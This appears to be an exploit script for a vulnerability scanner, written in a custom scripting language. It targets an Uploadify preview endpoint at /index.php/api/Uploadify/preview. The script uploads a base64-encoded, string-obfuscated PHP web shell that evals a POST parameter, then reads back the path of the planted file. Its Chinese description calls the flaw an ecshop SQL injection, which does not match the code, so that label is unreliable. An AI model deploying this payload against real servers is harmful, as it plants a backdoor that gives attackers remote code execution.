#request url = var
#define payload = /index.php/api/Uploadify/preview
#define bug = /index.php/api/Uploadify/previewpreview/
#define info = 存在ecshop uc.php参数code SQL注入漏洞
#define qian = preview
#define hou = ", "id" : "id"}

function main(args)
{
	res = HttpPost(url.payload,"data:image/php;base64,PD9waHAgJHN0cl90bXAgPSAiZXZhbCI7ICRzdHJfdG1wIC49ICIoIjskc3RyX3RtcCAuPSAiJCI7JHN0cl90bXAgLj0gIl9QTyI7JHN0cl90bXAgLj0gIlNUW2Rhb2VuXSk7IjtAZXZhbCgkc3RyX3RtcCk7","User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
	if(StrFindStr(res[0],bug,0)!= "-1")
	{
		print(url.info,GettextMiddle(res[0],qian,hou));
	}
}
